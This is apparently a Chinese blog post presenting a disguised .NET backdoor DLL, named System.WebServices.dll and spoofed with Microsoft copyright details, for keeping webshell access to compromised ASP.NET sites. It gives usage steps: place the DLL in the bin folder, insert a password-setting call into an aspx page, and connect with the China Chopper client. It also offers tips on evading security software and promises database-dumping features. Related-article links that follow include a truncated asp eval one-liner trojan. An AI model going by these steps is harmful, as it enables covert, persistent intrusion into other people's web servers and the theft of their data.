首先解释一下为什么要做这个玩意:
众所周知.net一句话是不能插入到文件之中的,除非那个页面使用Jscript编写,但是现在看来
Jscript市场很低,遇到的.net站基本都是C#。新建一个SHELL太过于明显,而且其中的eval更是在WEBSHELL扫描工具的淫威下直接
出局。如果不能提权的话,那么过一段时间再打开往往面临的是大大的404。
综上,利用.net会加载bin目录中的类库的特点和命名空间这个神奇
的东西编写了这个程序,将文件放在bin目录并在文件中插入调用代码即可。可能你会说放在bin目录不是更明显?这里要说明一点,相信许多的管理猿/站长
都没有查看bin目录的习惯,而管理猿/站长并不一定是C#程序猿。假如你是一个这样的管理猿/站长,看到一个名叫
System.WebServices.dll、版权写的是微软、产品名称是.Net FrameWork的类库你会不会删?
当然这方法瞒不过聪明的管理猿,但传统方式同样瞒不住。可能这东西有些鸡肋,但在某些时候未必没有用处。
另外,限于菜刀提供的接口,程序功能远远不全,对应的外壳正在开发中,届时会带有更强的功能,敬请期待。
(后续将提供的功能:一键脱裤、注册表管理、以其他用户权限执行程序等)

0x02 使用说明 
一、将System.WebServices.dll复制到网站根目录的bin子目录中。
二、在任意.net页面插入<%WebServices.ShowRunnerVersion();%>并访问,出现授权与免责声明页面表示调用成功。
三、删除第二步中插入的代码,重新插入<%WebServices.InitalizeWebServices("fuck");%>,其中fuck为菜刀连接所需的密码。
四、使用中国菜刀连接,类型选择Customize,密码为第三步中约定的密码。

0x03 注意 
一、
程序无视预编译,代码可以插在任意aspx页面内,如果连接失败则是因为在先前代码中(.cs或预编译之后的库中)调用了Response.End()方
法,请更换页面。如果是插入到页面对应的.cs代码文件之中,请去除脚本标记<%%>之后插入到Page_Load方法对应的代码块之中。
二、由于菜刀对于Customize的连接方式是非加密的,所以安全狗等防御软件会拦截查询数据库等操作,遇到此情况请换用.net菜刀一句话或使用其他脚本查询(外壳做出来后会换用加密连接)。
三、发现BUG或提出建议请到农村人博客->草泥马之家留言,毕竟是蛋疼的东西还请多多包涵。
四、本程序只为学习.net编程,任何人使用前必须搭建测试站点并在页面之中调用WebServices.ShowRunnerVersion()方法访问以阅读授权及免责声明。对于因使用不当造成的后果本人不负有任何的法律责任。

ASPX版菜刀一句话,留后门专用的更多相关文章

  1. PHP、asp、aspx、JSP一句话

    PHP.asp.aspx.JSP一句话 原文地址:https://www.cnblogs.com/JoEcO01/p/11556413.html  1.asp一句话木马: <%eval requ ...

  2. ThinkPHP留后门技巧

    原文链接:https://www.leavesongs.com/PENETRATION/thinkphp-callback-backdoor.html 90sec上有人问,我说了还有小白不会用.去年我 ...

  3. 利用Fiddler2和Proxifier分析你用的中国菜刀是否带有后门

    为了避免自己辛辛苦苦拿下的站点被一些拿来主义者不费吹灰之力就据为己有,下面来教大家如何检测菜刀有没有留后门. 对于有没有后门这个问题,大牛们会说抓包看一下就行了,那如何抓包呢?有很多软件可以,这里使用 ...

  4. 使用大白菜U盘进入PE后再次重启电脑会留后门的清理方法

    使用大白菜U盘进入PE后再次重启电脑会留后门,这个后门主要是自动下载安装一些软件,比如金山毒霸等. 清除方法: 1.每次用完PE重启前,清理以下地方: ①c:\Windows\xxxxx.exe(查看 ...

  5. 入侵者已经拿到了主机的管理员权限,请你列举几种留后门的方法:(windows和LINUX系统均可)

    Webshell后门 XSS后门 远控后门&rootit(windows&LINUX) SSH后门 SHIFT终端服务器后门 系统用户账号克隆 SQL数据库扩展存储型后门 SQL数据库 ...

  6. meterpreter 如何留后门,使攻击持久化

    安装后门方法一:meterpreter >run persistence -X -i 5 -p 443 -r 192.168.0.108 Persistent agent script is 6 ...

  7. PHP之编写日志文件留后门(免杀)

    (我知道你们都喜欢干货,所以也没亏待你们,请到文末吧,成果附件已上传~) 本文原创作者:Laimooc(原名xoanHn) 鄙人宗旨: 本人秉着爱学习爱恶搞爱研究爱进步并且遵纪守法的心态写下这篇文章, ...

  8. 如何自己写aspx过狗D盾一句话木马

    hi,我是凉风,(以下内容纯属个人见解,如有不同的意见欢迎回复指出) ,本菜比发现aspx过狗的姿势不常见,不像php一样一抓一大把,于是我决定研究一下aspx 本文作者:i春秋签约作家——凉风 引用 ...

  9. 9. 那些强悍的PHP一句话后门

    强悍的PHP一句话后门 这类后门让网站.服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的.今天我们细数一些有意思的PHP一句话木马. 利用4 ...

随机推荐

  1. sys.path和os.path

    sys.path和os.path1.sys.path是python搜索模块的路径集合,是个list:os.path是os的一个模块,是操作文件和目录的模块 2.sys.path和PYTHONPATH首 ...

  2. 【JAVA、C++】LeetCode 002 Add Two Numbers

    You are given two linked lists representing two non-negative numbers. The digits are stored in rever ...

  3. hdu 1098 Lowest Bit 解题报告

    题目链接:http://code.hdu.edu.cn/game/entry/problem/show.php?chapterid=1&sectionid=2&problemid=22 ...

  4. 【python】pathlib库

    pathlib在python3.2以上开始默认支持,在python2.7中如果要使用需要安装 pip install pathlib pathlib更多参考资料:http://pathlib.read ...

  5. 【VirtualBox】端口转发,ssh

    端口转发 VirualBox的设置 - 网络 - 端口转发 里面有主机IP.主机端口.子系统IP.子系统端口 设置后的含义是:当外部访问主机IP:主机端口后,将会把访问映射到虚拟机的子系统IP和子系统 ...

  6. 有关GPU硬件的理解

    1 显卡的DRAM相当于CPU的RAM (Random access memory, 内存). 二者共同的特点是通电的时候才能使用,不正常断电数据就丢失,但正常情况下,会将数据存储到硬盘中.显存又称帧 ...

  7. GPU CUDA 经典入门指南

    转自:http://luofl1992.is-programmer.com/posts/38830.html CUDA编程中,习惯称CPU为Host,GPU为Device.编程中最开始接触的东西恐怕是 ...

  8. Find them, Catch them(poj 1703)

    题目大意: 在这个城市里有两个黑帮团伙,现在给出N个人,问任意两个人他们是否在同一个团伙输入D x y代表x于y不在一个团伙里输入A x y要输出x与y是否在同一团伙或者不确定他们在同一个团伙里 思路 ...

  9. ShareSDK集成微信、QQ、微博分享

    1.前言 为什么要使用第三方的作为集成分享的工具呢?而不去用官方的呢?有什么区别么? 一个字"快",如果你使用官方的得一个个集成他们的SDK,相信这是一个痛苦的过程. 2.准备需要 ...

  10. HTML基础2 表单和框架

    表单: <form id="" name="" method="post/get" action"负责处理的服务端" ...